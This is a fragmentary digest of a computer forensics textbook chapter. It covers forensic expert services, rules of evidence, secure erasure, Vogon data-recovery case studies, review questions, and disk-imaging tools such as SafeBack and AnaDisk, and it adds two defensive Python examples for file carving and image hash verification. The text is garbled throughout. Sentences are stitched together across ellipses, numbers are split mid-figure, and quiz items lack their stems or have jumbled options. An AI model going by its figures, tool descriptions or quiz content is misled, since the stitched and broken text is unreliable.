Your computer forensics expert’s experience should include installing cameras in every imaginable location (indoors and outdoors, offices, homes, warehouses, stores, schools, or vehicles) for every conceivable crime (theft, burglaries, homicides, gambling, narcotics, prostitution, extortion, or embezzlement) under every conceivable circumstance (controlled settings, hostage crisis, or court-ordered covert intrusion)
...
This even includes situations where employees may be misusing company computers
...
CHILD EXPLOITATION
Child sexual exploitation
Child pornography
Manufacture
Use
Sale
Trading
Collection
Child erotica
Use of computers in child exploitation
Search and seizure
Victim acquisition
Behavior of preferential and situational offenders
Investigation
Proactive
Reactive [4]
Computer Evidence Service Options
Your computer forensics experts should offer various levels of service, each designed to suit your individual investigative needs
...
They must be able to provide clean rooms and ensure that all warranties on your equipment will still be valid following their services
...
While on-site, the experts should quickly be able to produce exact duplicates of the data storage media in question
...
Your experts should also be able to help federal marshals seize computer data and be very familiar with the Federal Guidelines for Searching and Seizing Computers
...
They should be able to work on it without interruption until your evidence objectives are met
...
Priority service typically cuts your turnaround time in half
...
Weekend service depends on the availability of computer forensics experts
...
These services include
Analysis of computers and data in criminal investigations
On-site seizure of computer data in criminal investigations
Analysis of computers and data in civil litigation
...
Files may be accidentally deleted
...
Computer viruses may corrupt files
...
Disgruntled employees may try to destroy your files
...
You may think it’s lost forever, but computer forensics experts should be able to employ the latest tools and techniques to recover your data
...
The advanced tools that computer forensics experts utilize allow them to find your files and restore them for your use
...
Advise You on How to Keep Your Data and Information Safe from Theft or Accidental Loss
Business today relies on computers
...
Equally threatening, but far less considered, are unintentional data losses caused by accidental deletion, computer hardware and software crashes, and accidental modification
...
The experts can also thoroughly clean sensitive data from any computer system you plan on eliminating
...
Computer forensics experts should survey your business and provide guidance for improving the security of your information
...
Examine a Computer to Find Out What Its User Has Been Doing
Whether you’re looking for evidence in a criminal prosecution, looking for evidence in a civil suit, or determining exactly what an employee has been up to, your computer forensics experts should be equipped to find and interpret the clues that have been left behind
...
As previously mentioned, your computer forensics experts should provide complete forensic services
...
Your computer forensics experts should also be able to regularly provide training to other forensic examiners, from both the government and private sectors
...
Sweep Your Office for Listening Devices
In today’s high-tech society, bugging devices, ranging from micro-miniature transmitters to micro-miniature recorders, are readily available
...
Your computer forensics experts should have the equipment and expertise to conduct thorough electronic countermeasures (ECM) sweeps of your premises
...
The experts should be uniquely qualified to conduct investigations involving cellular telephone cloning, cellular subscription fraud, software piracy, data or information theft, trade secrets, computer crimes, misuse of computers by employees, or any other technology issue
...
Don’t trust these sensitive inquiries to companies that don’t have the required expertise
...
Now, let’s examine how evidence might be sought in a wide range of computer crime or misuse, including theft of trade secrets, theft or destruction of intellectual property, and fraud
...
Any or all of this information may help during discovery, depositions, or litigation
...
It is always beneficial when your case involves hardware and software with which this expert is directly familiar, but fundamental computer design and software implementation is often quite similar from one system to another
...
Unlike paper evidence, computer evidence can often exist in many forms, with earlier versions still accessible on a computer disk
...
The discovery process can be served well by a knowledgeable expert identifying more possibilities that can be requested as possibly relevant evidence
...
These may take the form of earlier versions of data files (memos, spreadsheets) that still exist on the computer’s disk or on backup media or differently formatted versions of data, either created or treated by other application programs (word processing, spreadsheet, email, timeline, scheduling, or graphic)
...
A knowledgeable computer forensics professional should ensure that a subject computer system is carefully handled so that
No possible evidence is damaged, destroyed, or otherwise compromised by the procedures used to investigate the computer
No possible computer virus is introduced to a subject computer during the analysis process
Extracted and possibly relevant evidence is properly handled and protected from later mechanical or electromagnetic damage
A continuing chain of custody is established and maintained
Business operations are affected for a limited amount of time, if at all
Any client-attorney information that is inadvertently acquired during a forensic exploration is ethically and legally respected and not divulged [2]
...
1 in Appendix F) [2]
...
WHO CAN USE COMPUTER FORENSIC EVIDENCE?
Many types of criminal and civil proceedings can and do make use of evidence revealed by computer forensics specialists
...
Civil litigations can readily make use of personal and business records found on computer systems that bear on fraud, divorce, discrimination, and harassment cases
...
Corporations often hire computer forensics specialists to find evidence relating to sexual harassment, embezzlement, and theft or misappropriation of trade secrets, and other internal and confidential information
...
Individuals sometimes hire computer forensics specialists in support of possible claims of wrongful termination, sexual harassment, or age discrimination
...
Let’s examine some of those problems
...
It must be
Authentic
Accurate
Complete
Convincing to juries
In conformity with common law and legislative rules (i.e., admissible) [5]
There are also special problems:
Computer data changes moment by moment
...
The process of collecting computer data may change it—in significant ways
...
Computer and telecommunications technologies are always changing so that forensic processes can seldom be fixed for very long [5]
...
The general principles are:
The scene of crime has to be frozen; that is, the evidence has to be collected as early as possible and without any contamination
...
All procedures used in examination should be auditable; that is, a suitably qualified independent expert appointed by the other side in a case should be able to track all the investigations carried out by the prosecution’s experts [5]
...
Even so, for some purposes these may not be enough, for example, where it is hoped to recover previously deleted material or where a logic bomb or virus is suspected
...
Special training is also required
...
Thus, the key features of the forensic technician are
Careful methodology of approach, including record keeping
A sound knowledge of computing, particularly in any specialist areas claimed
A sound knowledge of the law of evidence
A sound knowledge of legal procedures
Access to and skill in the use of appropriate utilities [5]
Legal Tests
The rules vary from legislation to legislation, but one can give a broad outline of what happens in those countries with a common law tradition—the U.S., U.K., and the so-called old Commonwealth
...
Real evidence is that which comes from an inanimate object that can be examined by the court
...
The hearsay rule operates to exclude assertions made other than those made by the witness who is testifying as evidence of the truth of what is being asserted
...
Thus, there are rules about the proving of documents and business books
...
Some of the rules apply explicitly to computers, but many do not, although they can be (and have been) interpreted to cover many situations in which computers are involved
...
In practice, these issues may be circumvented
...
This evidence, however, then points investigators to admissible sources of evidence for the same sets of circumstances
...
In other words, computer search methods are often used to identify allegedly fraudulent transactions, but the evidential items eventually presented in court are paper-based invoices, contract notes, dockets, or other documents
...
Again, in civil litigation the parties may decide to jointly accept computer-based evidence (or not to challenge it) and instead concentrate on the more substantive elements in the dispute
...
Or, again, the legal team may not feel sufficiently competent to embark on a technical challenge
...
Law enforcement officers must comply with the Fourth Amendment to the U.S. Constitution
...
The ultimate aim of forensic investigation is its use in legal proceedings
...
It might be a mistake for inquiries not to be commenced simply because of fear of possible inadmissibility
...
One may have to take a somewhat pragmatic view of the precise bounds of the subject matter, but it should still be possible to define its core activities
...
Although forensic science was already well established, and indeed forms a central feature of many of Conan Doyle’s Sherlock Holmes stories published from 1892 onwards, up until the 1970s, each forensic scientist tended to develop his or her own methods and present them ad hoc to juries
...
During the 1970s, a more formal checklist-based approach was introduced
...
In the U.K. Home Office Forensic Service, these checklists were devised by senior staff
...
An increasingly used feature of modern practice is quality control, which involves work being checked by an otherwise uninvolved coworker before being offered to external scrutiny
...
The main reason is the rate of change of computer technology
...
However, in computers, newness and obsolescence are the norm
...
The floppy disk of 13 years ago was in 5
...
The
current equivalent is 3
...
44 MB, and much higher densities are
expected soon
...
25 inch form, and used modified frequency modulation (MFM) controller
technology
...
5 inch or
even 1
...
On minis and mainframes, data may be held on a redundant array of independent (or inexpensive) disks (RAID), where individual files may be split and spread over eight or more separate disk surfaces
...
Computer architectures have gone through profound changes in the same short period
...
Computer peripherals keep changing as well
...
They can be subverted, for example, for forgery
...
These provide opportunities for both high-tech criminals and forensic investigators
...
The foregoing simply lists technological changes
...
For example, over the same 13 years, the following technological changes have taken place:
The growth of email, both locally within large organizations and worldwide
...
The software outcome of the more complex hardware architectures
...
The ability of a PC or small local machine to interact with software and data held on other nonlocal machines and large mainframes in a way that appears to be seamless to the user
...
The evidence of a transaction or event may, therefore, only be provable by the presentation of all the records from all the computers involved, plus an explanation of how the assembly of the report relied on took place
...
EDIs have very complex structures, with some evidence being held in computers owned by the counter-parties and some by the EDI supplier/regulator
...
More extended, easier-to-use databases
...
The methods of writing and developing software
...
For example, object-oriented programming environments and new, more formal methods of program development; standards and methods of testing have also changed [5]
...
Nevertheless, the usual way in which specific forensic methods become accepted is via publication in a specialist academic journal
...
The rule of best practice refers to the use of the best practice available and known at the time of the giving of evidence
...
At no point of the investigation is this more critical than at the stage of initial evidence capture
...
Without the firm base of solid procedures, which have been strictly applied, any subsequent antirepudiation attempts in court will be suspect, and the case as a whole will likely be weakened
...
This may happen for several reasons
...
If the individuals involved have not been trained to the required standards, or have received no training at all, then tainted or damaged computer evidence is the sad but inevitable result
...
Not only lack of site experience, but also inappropriate experience of the type of systems, might be encountered
...
It is essential that a sympathetic working environment is created such that peer pressure or fear of loss of status and respect does not override the need to call for help
...
Finally, sloppiness, time pressure, pressure applied on-site, fatigue, and carelessness have all been contributory factors in transforming solid computer evidence into a dubious collection of files
...
There are issues with which one cannot sympathize
...
Ultimately, any time the collection of computer evidence is called into question, it is damaging to everyone who is a computer forensic practitioner; it is in everyone’s best interest to ensure that the highest standards are maintained
...
I cannot find the con man now and all I have is an alias and a pay-as-you-go mobile number
...
If you cannot obtain a real-world address (preferably within the jurisdiction in which you live), then think twice about going any further
...
Pagers start with 076xx
...
If you do want to proceed with the transaction, then use a credit card rather than a debit card or other type of money transfer; then at least you will have some protection and only be liable for $50 rather than having your entire bank account cleaned out
...
An application for a civil search order can then allow entry and the experts will be able to secure all electronic evidence quickly and efficiently
...
So, yes, your computer forensic experts can help, but by taking the proper precautions, you would not need to call them in the first place
...
In recent months, investigators at Vogon International Limited [7] have been asked to examine computer data for evidence of fraud
...
In both cases, fraud totaling hundreds of thousands of dollars was uncovered
...
Bogus companies were set up and invoices were submitted for payment
...
In addition, one of the fraudsters was paying another member of the staff to turn a blind eye to what was happening
...
The message is simple: whether you are a multinational company or a small business, the possibility of fraud is ever present
...
Secure Erasure
Now, let’s touch on this “old chestnut” again, because it appears to be the source of considerable confusion and misinformation
...
The latter may be criminals who wish to cover their tracks from the police or legitimate business organizations who wish to protect themselves from confidential information falling into the wrong hands
...
The legitimate destruction of data is ultimately a matter of management responsibility, which requires a considered risk analysis to be carried out
...
If you were to ask, “Is it straightforward or certain?”, then “it depends” would be the answer
...
Some are effective, some completely ineffective, and some partially effective
...
Those systems that absolutely destroy data do so in a manner that is total, unequivocal, and final; there can exist no doubt as to their effectiveness
...
With only cursory analysis, this is evident, so these are (or should be) swiftly disregarded
...
What they find is that frequently only a fraction of a sample sent is correctly or accurately deleted
...
Certain revisions of drive firmware can present special challenges; in some cases, even the software used defeats the eraser
...
Vogon is often asked for advice on this issue [7]
...
If the destruction of data has more value than the drive, physically destroy the drive
...
If the drive has more value than the data, what are you worrying about?
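Two points made earlier, that deleted files leave vital clues behind and that an erasure tool frequently removes only a fraction of a test sample, can be watched on a toy block device. This is an added example, not code from the book or from Vogon; the disk layout, the MEMO record format and the sample records are all constructed for illustration.

```python
"""Added example (not from the book): a toy block device showing why an
ordinary delete leaves evidence behind, and a check of how much of a known
sample an erasure tool actually removed.  Disk layout, record format and the
sample memos are constructed for illustration only."""
import re

BLOCK = 64    # bytes per block (tiny, for illustration)
BLOCKS = 32   # a 2 KiB "disk"


class ToyDisk:
    """Raw blocks plus a directory mapping file name -> (block list, size)."""

    def __init__(self):
        self.blocks = bytearray(BLOCK * BLOCKS)
        self.directory = {}
        self.free = list(range(BLOCKS))

    def write_file(self, name, data):
        """Allocate whole blocks and store the data; bytes beyond the end of the
        data in the last block (slack space) are left exactly as they were."""
        needed = -(-len(data) // BLOCK)          # ceiling division
        if needed > len(self.free):
            raise OSError("disk full")
        used = [self.free.pop(0) for _ in range(needed)]
        for i, blk in enumerate(used):
            chunk = data[i * BLOCK:(i + 1) * BLOCK]
            self.blocks[blk * BLOCK:blk * BLOCK + len(chunk)] = chunk
        self.directory[name] = (used, len(data))

    def read_file(self, name):
        used, size = self.directory[name]
        raw = b"".join(bytes(self.blocks[b * BLOCK:(b + 1) * BLOCK]) for b in used)
        return raw[:size]

    def delete(self, name):
        """Ordinary delete: only the directory entry goes; the data stays on
        disk until the blocks happen to be reused."""
        used, _ = self.directory.pop(name)
        self.free.extend(used)

    def overwrite_delete(self, name, fill=b"\x00"):
        """Overwrite every block the file occupied, then release the entry."""
        used, _ = self.directory[name]
        for b in used:
            self.blocks[b * BLOCK:(b + 1) * BLOCK] = fill * BLOCK
        self.delete(name)


MEMO = re.compile(rb"MEMO:[^\n]*\n")   # constructed record signature


def carve_memos(disk):
    """Signature-based carving over the raw blocks, ignoring the directory:
    this is how an examiner finds records whose file entries no longer exist."""
    return [m.group(0) for m in MEMO.finditer(bytes(disk.blocks))]


def residual_fraction(disk, samples):
    """Share of known sample records still present in the raw blocks after an
    erasure tool ran: 1.0 means nothing was removed, 0.0 means all were."""
    raw = bytes(disk.blocks)
    return sum(1 for s in samples if s in raw) / len(samples)


SAMPLES = [  # constructed test records, the "sample sent" to an eraser
    b"MEMO: harassing note sent to a coworker\n",
    b"MEMO: copy of the trade-secret formula\n",
    b"MEMO: quarterly figures, unremarkable\n",
]


def demo():
    """Write three memos, delete one normally, overwrite one, then see what
    carving still recovers and what share of the samples survived."""
    disk = ToyDisk()
    for i, memo in enumerate(SAMPLES):
        disk.write_file(f"memo{i}.txt", memo)
    disk.delete("memo0.txt")              # entry gone, bytes still in block 0
    disk.overwrite_delete("memo1.txt")    # block 1 really zeroed
    disk.write_file("new.txt", b"NEW: unrelated\n")  # lands in a fresh block
    return carve_memos(disk), residual_fraction(disk, SAMPLES)


if __name__ == "__main__":
    carved, fraction = demo()
    print(len(carved), "memos carved; residual fraction", round(fraction, 2))
```

The carving step recovers the normally deleted memo and the one never deleted, and the residual fraction of 2/3 is the figure an examiner would report back for this eraser.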
CASE STUDIES
Over the years, Vogon’s data-recovery laboratories have seen pretty much everything that can happen to a computer, no matter how incredible, whether it is a geologist who, in testing for minerals, inadvertently blew up his own laptop, or the factory worker who covered the computer running the production line in maple syrup
...
Fortuitously, two of the latest in a long line of incredible recoveries occurred recently, so it seemed appropriate to include them as case studies
...
Almost immediately thereafter, a laptop accelerates rapidly groundward out of the window of the aforementioned premises
...
Luckily, no one was injured by the impact
...
The laptop computer had impacted the ground across its front edge at an angle, forcing the hard disk drive assembly to go completely through the screen of the laptop
...
This imparted an oscillation in two dimensions during drive operation
...
After an evening’s work by a highly skilled hardware engineer, it was determined that a full fix was possible, and a perfect image was taken
...
Case Study Two: The Case of the Burned Tapes
This case does not involve true forensic investigation, but it does highlight the fact that it is important never to give up on a job, no matter how seemingly hopeless it appears
...
The DAT tapes were caught in a fire, which had engulfed a company’s head office and wiped out the primary trading infrastructure
...
The DAT tapes had, rather inadvisably as it turned out, not been stored off-site
...
Despite this, the DAT tapes arrived in a rather sorry condition
...
It is fair to say the tapes were sent to Vogon with the full expectation that they would be declared unrecoverable and used as the basis from which to make a loss settlement [7]
...
The tapes were carefully cut away from the molten mass and treated for fire damage
...
Following a number of complex stages, the recovery team was able to extract a stream of data from the tapes that accounted for some 95% of the original data stored on the company’s tape backups
...
It also resulted in a significant reduction in the claims settlement by the loss adjuster and business continuity for the unfortunate company
...
In 1977, there were 291 U.S. federal cases and 246 state cases in which the word computer appeared and which were sufficiently important to be noted in the Lexis database
...
However, as early as 1968, the computer’s existence was considered sufficiently important for special provisions to be made in the English Civil Evidence Act
...
As far as one can tell, noncontentious cases tend not to be reported, and the arrival of computers in commercial disputes and in criminal cases did not create immediate difficulties
...
This is not to say that such cases were without difficulty; however, no completely new principles were required
...
Some of these were tackled in legislation, as with the English 1968 act and the U.S. Federal Rules of Evidence in 1976, but many were addressed in a series of court cases
...
For example, computer-originated evidence or information that is not immediately readable by a human being is usually gathered by a mechanical counting or weighing instrument
...
The focus of most of this legislation and judicial activity was determining the admissibility of the evidence
...
They extend beyond mere guidance
...
Nevertheless, they have acquired a status of their own and in some cases prevent a court from making ad hoc common sense decisions about the quality of evidence
...
It is not wholly possible for someone interested in the practical aspects of computer forensics (that is, the issues of demonstrating authenticity, reliability, completeness, or lack thereof) to separate out the legal tests
...
The following conclusions are not exhaustive, nor is the order significant
...
This is the direct analogy to proving the authenticity of a print-based document
...
This is the situation where a series of original events or transactions are input by human beings, but where after regular computer processing, a large number of reports, both via print-out and on-screen can be generated
...
Real evidence: Machine-readable measurements and the like (weighing, counting, or otherwise recording events) and the reading of the contents of magnetic stripes and bar codes and smart cards
...
Electronic transactions: To prove that a transaction took place or to demonstrate a presumption was incorrect
...
Conclusions reached by search programs: These are programs that have searched documents, reports, and so on, for names and patterns
...
Event reconstruction: To show a sequence of events or transactions passing through a complex computer system
...
Typical examples include computer contract disputes (when a computer failed to deliver acceptable levels of service and blame must be apportioned), disaster investigations, and failed trade situations in securities dealing systems
...
Liability in a situation is also where a computer program has made a decision (or recommendation) based on the application of rules and formulae, where the legal issue is the quality and reliability of the application program, and the rules with which it has been fed
...
An Agenda for Action
When completing the Principle Forensic Activities Checklist (as shown in Table F1
...
The order is not significant; however, these are the activities for which the researcher would want to provide a detailed description of procedures, review, and assessment for ease of use and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and an optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
5
...
Multiple Choice
1
...
How to recover data from computers while preserving evidential integrity
B
...
How to securely store and handle recovered data
D
...
How to present the information to a court of law and to defense during disclosure
2
...
A defined methodology
B
...
A breach of contract
D
...
Tort, including negligence
3
...
Simple to use
B
...
Totally reliable
D
...
Legally operable
4
...
The computer forensics specialist will take several careful steps to identify and attempt to retrieve possible evidence that may exist on a subject computer system
...
Protects the subject computer system during the forensic examination from any possible alteration, damage, data corruption, or virus introduction
B
...
This includes existing normal files, deleted yet remaining files, hidden files, password-protected files, and encrypted files
C
...
Reconstructs system failure
E
...
A computer forensics professional does more than turn on a computer, make a directory listing, and search through files
...
For example, they should be able to perform the following services, except:
A
...
Data duplication and preservation
C
...
Document searches
E
...
Please explain how the computer forensics professional went about resolving the problem
...
How would your computer forensics team go about preserving and recovering the electronic data?
Case Project
Let’s look at a real-world scenario and how computer forensics plays into it
...
She captures several minutes’ worth of network traffic to review with a protocol analyzer
...
A user’s desktop has sent a well-formed packet to an obscure port on an unfamiliar IP address outside the company’s firewall
...
This intrigues the sysadmin, who does a lookup of the IP address; it comes back as one of the firm’s competitors
...
She picks up the phone and calls her boss
...
Please explain how you would handle this situation
...
How do you as a computer forensics specialist handle this?
REFERENCES
[1] “2003 Computer Crime and Security Survey,” Federal Bureau of Investigation, J
...
C
...
[2] Robbins, Judd, “An Explanation of Computer Forensics,” National Forensics Center, 774 Mays Blvd
...
All rights reserved), 2001
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
, 18950 U.S. Highway 441, Suite 201, Mount Dora, Florida 32757, 2001
...
All rights reserved), 2001
...
http://csrc
...
ac
...
[6] Vacca, John R
...
[7] Vogon Forensics Bulletin, Vol
...
2 Types of Computer Forensics Technology
Defensive information technology will ultimately benefit from the availability of cyber forensic evidence of malicious activity
...
Today, an increased opportunity for cyber crime exists, making advances
in the law enforcement, legal, and forensic computing technical arenas imperative
...
Cyber forensics focuses on real-time, online evidence gathering rather than
the traditional offline computer disk forensic technology
...
The first, computer forensics, deals with gathering evidence from computer
media seized at the crime scene
...
Several computer
forensic tools are available to investigators
...
It involves gathering
digital evidence that is distributed across large-scale, complex networks
...
Network forensics deals primarily with in-depth analysis of computer network intrusion evidence, because current commercial intrusion analysis tools are inadequate to deal with today’s networked, distributed environments
...
Computer Forensics, Second Edition
In a networked, distributed environment, it is imperative to perform forensic-like examinations of victim information systems on an almost continuous basis, in addition to traditional postmortem forensic analysis
...
Few, if any, forensic
tools are available to assist in preempting the attacks or locating the perpetrators
...
These objectives include timely cyberattack
containment, perpetrator location and identification, damage mitigation, and recovery initiation in the case of a crippled, yet still functioning, network
...
Cyber forensics adds inspection of transient and other frequently overlooked
elements such as contents or state of memory, registers, basic input/output system,
input/output buffers, serial receive buffers, L2 cache, front side and back side system
caches, and various system buffers (drive and video buffers)
...
It
is beyond the scope of this chapter to cover in detail every type of computer forensic technology
...
TYPES OF MILITARY COMPUTER FORENSIC TECHNOLOGY
The U.S. Department of Defense (DoD) cyber forensics includes evaluation and in-depth examination of data related to both the trans- and post-cyberattack periods
...
Real-time tracking of potentially malicious activity is especially difficult when the pertinent information has been intentionally
hidden, destroyed, or modified in order to elude discovery
...
The directorate entered into
a partnership with the National Institute of Justice via the auspices of the National
Law Enforcement and Corrections Technology Center (NLECTC) located in
Rome, New York, to test these new ideas and prototype tools
...
This first-of-a-kind event represents a new paradigm for transitioning cyber forensic technology from military research and development (R&D) laboratories into the hands
of law enforcement
...
The central hypothesis of CFX-2000 is that it is possible to accurately determine
the motives, intent, targets, sophistication, identity, and location of cyber criminals
and cyber terrorists by deploying an integrated forensic analysis framework
...
The NLECTC assembled a diverse group of computer crime investigators from
DoD and federal, state, and local law enforcement to participate in the CFX-2000
exercise hosted by the New York State Police’s Forensic Investigative Center in Albany, New York
...
Each team received an identical set of software tools and was presented with identical initial
evidence of suspicious activity
...
1) [1]
...
The Synthesizing
Information from Forensic Investigations (SI-FI) integration environment, developed under contract by WetStone Technologies, Inc
...
SI-FI supports the collection, examination, and
analysis processes employed during a cyber forensic investigation
...
Investigators can seal evidence in the DEBs
and use the SI-FI implementation to collaborate on complex investigations
...
The teams used
other forensic tools and prototypes to collect and analyze specific features of the
FIGURE 2
...
All rights reserved)
...
The results of CFX-2000 verified that the hypothesis was largely correct and that it is possible to
ascertain the intent and identity of cyber criminals
...
TYPES OF LAW ENFORCEMENT COMPUTER
FORENSIC TECHNOLOGY
As previously defined, computer forensics involves the preservation, identification,
extraction, and documentation of computer evidence stored in the form of magnetically encoded information (data)
...
Such information may actually be hidden from view and, thus,
special forensic software tools and techniques are required to preserve, identify, extract, and document the related computer evidence
...
Computer forensics tools and techniques have become important
resources for use in internal investigations, civil lawsuits, and computer security
risk management
...
Such computer forensic software tools can also be used to identify backdated files
and to tie a diskette to the computer that created it
...
This section touches very briefly on issues dealing with
Windows NT®, Windows® 2000, XP and 2003 and their use within law enforcement
computer forensic technology
...
Thus,
they are currently the operating systems most likely to be encountered in computer
investigations and computer security reviews
...
Those tools are good
for some basic investigation tasks, but they do not offer a full computer forensics
solution
...
Such assessments usually require that searches and file listings be conducted overtly or even covertly from a single floppy diskette
...
Computer processing procedures have also been developed for the U.S. Treasury Department
...
For these reasons,
computer forensic trainers and instructors should be well qualified to teach the correct computer-processing methods and procedures
...
Computer forensic instructors should expose their trainees to
bit stream backup theories that ensure the preservation of all storage levels that may
contain evidence
...
SafeBack technology can be purchased from
New Technologies, Inc
...
S
...
MIRROR IMAGE BACKUP SOFTWARE
SafeBack is used to create mirror-image (bit-stream) backup files of hard disks or to
make a mirror-image copy of an entire hard disk drive or partition
...
Once the photo negative has been made, several exact reproductions can be made of the original
...
This is because SafeBack is an industry standard self-authenticating computer
forensics tool that is used to create evidence-grade backups of hard drives
...
0 or higher, the integrity of SafeBack files is
maintained through the use of two separate mathematical hashing processes that rely
upon the National Institute of Standards and Technology (NIST)-tested Secure Hash
Algorithm 256 (SHA-256)
...
0
...
forensicsintl
...
The upgraded SafeBack has new and added features and takes into account
the last-sector error that NIST found in the older SafeBack version 2
URLs are subject to change without notice
...
SafeBack preserves all the data on a backed-up or copied hard disk, including inactive
or deleted data
...
Remote operation via a parallel port connection allows the hard disk on a remote PC
to be read or written by the master system
...
This hash can be used to
cross-validate the accuracy of the process with any other software utility that relies
upon the NIST-tested SHA-256 algorithm, provided the hash computed at acquisition was recorded outside the image (in the examiner's notes or a separate file) so that a later recomputation has something independent to compare against
...
Any alterations of computer data are quickly brought to the
attention of the operator of the program when the SafeBack image file is restored
...
SafeBack picks up every last bit of data, unused and erased data included, on
the original disk and stores it in a tape or disk file (or series of files)
...
SafeBack does not write or otherwise modify the original system and can (and
should) be started from a boot diskette, after confirming that the BIOS boot order will not boot the suspect drive first
...
The first is Verify
mode, where restoring from a backup disk is done, but the data is thrown away
...
The other derivative operation is Copy, which feeds the Restore function
directly with the output of the Backup function, with no intermediate files
...
If the operator of SafeBack is considering making a copy, he might as well make a backup image file and then restore it as needed
...
No software dongle
...
Incorporates two separate implementations of the NIST-tested SHA-256 algorithm
to ensure the integrity of all data contained on the target computer storage device
...
Checks for possible data hiding when sector cyclic redundancy checks (CRCs)
do not match on the target hard disk drive
...
Accurately copies all areas of the hard disk drive
...
Allows for the backup process to be made via the printer port
...
SafeBack image files can be stored as one large file or separate files of fixed sizes
...
Uses tried and proven evidence preservation technology with a long-term
legacy of success in government agencies
...
It is fast and efficient
...
Processing
speeds are much faster when state-of-the-art computer systems are used to
make the backup
...
Copies and restores multiple partitions containing one or more operating systems
...
Accuracy of the backup process is assured through the combination of
mathematical CRCs and the SHA-256 hashes described above, which provides a level of assurance beyond that of a 128-bit digest such as MD5 on its own (MD5 is a cryptographic message digest, not a CRC)
...
The current version of SafeBack compresses unused and unformatted sections
of the hard disk drive to increase processing speeds and to conserve storage
space concerning the writing of the SafeBack image file [3]
...
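The hash cross-validation and the sector-CRC data-hiding check described for SafeBack above, as an added example that is not SafeBack's own code: a whole-image SHA-256 that any independent tool can recompute, plus a per-sector CRC32 list that localises an alteration the whole-image hash can only report. The 512-byte sector size, the sidecar manifest layout and the 8-sector sample image are assumptions constructed for this example.

```python
"""Whole-image SHA-256 plus per-sector CRC32 for a bit-stream image (added example)."""
from __future__ import annotations

import hashlib
import json
import zlib

SECTOR = 512  # assumption: classic 512-byte sectors


def sha256_stream(data: bytes, chunk: int = 1 << 20) -> str:
    """Hash in fixed-size chunks, as you would over a device file too large for RAM."""
    h = hashlib.sha256()
    for off in range(0, len(data), chunk):
        h.update(data[off:off + chunk])
    return h.hexdigest()


def sector_crcs(image: bytes) -> list[int]:
    """CRC32 of every sector; a short final sector is checksummed as-is."""
    return [zlib.crc32(image[off:off + SECTOR]) & 0xFFFFFFFF
            for off in range(0, len(image), SECTOR)]


def make_manifest(image: bytes) -> dict:
    """Sidecar record produced at acquisition and kept with the image as evidence."""
    return {"sector_size": SECTOR, "length": len(image),
            "sha256": sha256_stream(image), "sector_crc32": sector_crcs(image)}


def manifest_json(manifest: dict) -> str:
    """Serialise the sidecar so an independent SHA-256 tool can read the recorded hash."""
    return json.dumps(manifest, indent=1)


def verify_image(image: bytes, manifest: dict) -> dict:
    """Overall verdict plus the indices of any sectors whose content changed."""
    sha_ok = sha256_stream(image) == manifest["sha256"]
    current, recorded = sector_crcs(image), manifest["sector_crc32"]
    altered = [i for i, (a, b) in enumerate(zip(current, recorded)) if a != b]
    # A truncated or grown image is an alteration too; zip() alone would hide it.
    altered.extend(range(min(len(current), len(recorded)), max(len(current), len(recorded))))
    return {"sha256_ok": sha_ok, "length_ok": len(image) == manifest["length"],
            "altered_sectors": altered}


def tampered_copy(image: bytes, sector: int, index: int = 0) -> bytes:
    """Flip one bit in one sector, standing in for post-acquisition alteration."""
    buf = bytearray(image)
    buf[sector * SECTOR + index] ^= 0x01
    return bytes(buf)


# Constructed 8-sector sample image: sector i is filled with the byte value i.
SAMPLE_IMAGE = b"".join(bytes([i]) * SECTOR for i in range(8))

if __name__ == "__main__":
    manifest = make_manifest(SAMPLE_IMAGE)
    print(manifest_json(manifest)[:160])
    print(verify_image(SAMPLE_IMAGE, manifest))
    print(verify_image(tampered_copy(SAMPLE_IMAGE, 5, 10), manifest))
```

The manifest, not the image, is what the second tool's output is compared against; a single flipped bit changes the SHA-256 and also pins the damage to sector 5, which is the behaviour the CRC mismatch check relies on when it reports possible data hiding.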
The participant should be able to demonstrate his or her ability to avoid destructive programs
and traps that can be planted by computer users bent on destroying data and evidence
...
Computer Forensics Documentation
The documentation of forensic processing methodologies and findings is important
...
If
the security or audit findings become the object of a lawsuit or a criminal investigation, then documentation becomes even more important
...
The benefits will be
obvious to investigators, but they will also become clear to internal auditors and
computer security specialists
...
Techniques and automated tools
that are used to capture and evaluate file slack should be demonstrated in a training course
...
These security and evidence issues should also be discussed and demonstrated during the
training course
...
Types of Computer Forensics Technology
43
Data-Hiding Techniques
Trade secret information and other sensitive data can easily be secreted using any
number of techniques
...
These issues should be discussed in any
computer forensics training course from a detection standpoint, as well as from a
security risk standpoint
...
Participants should be required to
demonstrate their understanding of such issues
...
Data-hiding courses are only open to classified government agencies and
businesses that have a demonstrated need to know about this kind of information
as outlined in a company’s training policies
...
ANADISK DISKETTE ANALYSIS TOOL
AnaDisk turns your PC into a sophisticated diskette analysis tool
...
S
...
It is
primarily used to identify data storage anomalies on floppy diskettes; generic
hardware, in the form of a standard floppy disk controller and BIOS, is needed to run this
software
...
The software also has limited search capabilities and can be used to copy
abnormal diskettes
...
AnaDisk has the capability to duplicate floppy diskettes, but this feature is used
primarily with odd diskette formats (in cases like the FBI Russian mole case of suspected spy Robert Phillip Hanssen)
...
’s CopyQM (see
sidebar “CopyQM: Diskette Duplication Software”), which has been upgraded and
certified by the U.S. DoD for making copies of diskettes used in classified computer
security risk reviews
...
It can also be used in data-hiding courses
to create data-hiding areas by adding extra sectors and tracks to floppy diskettes and
in writing data to unformatted floppy diskettes
...
No software dongle
...
Keyword searches can be conducted at a very low level and on diskettes that
have been formatted with extra tracks
...
All DOS formats are supported, as well as many non-DOS formats (Apple
Macintosh, Unix TARTM, and many others)
...
Allows custom formatting of diskettes with extra tracks and sectors
...
Data mismatches, concerning some file formats, are also identified when file
extensions have been changed in an attempt to hide data
...
COPYQM: DISKETTE DUPLICATION SOFTWARE
CopyQM Plus essentially turns a personal computer into a diskette duplicator
...
This capability is useful for
computer forensics specialists and computer security specialists who need to preconfigure floppy diskettes for specific uses and duplicate them
...
Programs like New
Technology Inc
...
S
...
CopyQM is also certified by
the U.S. DoD for use in the duplication of “search disks” used in classified U.S.
government computer risk reviews
...
This feature makes CopyQM an ideal tool for use
in security reviews because once a CopyQM disk-creation program has been created,
it can be used by anyone to create pre-configured security risk assessment diskettes
...
This process requires little technical knowledge and it allows computer specialists to delegate more of the security risk assessment responsibilities to employees
with minimal technical knowledge
...
This is
helpful when you want to keep computer forensic and computer security software
tools away from curious hands
...
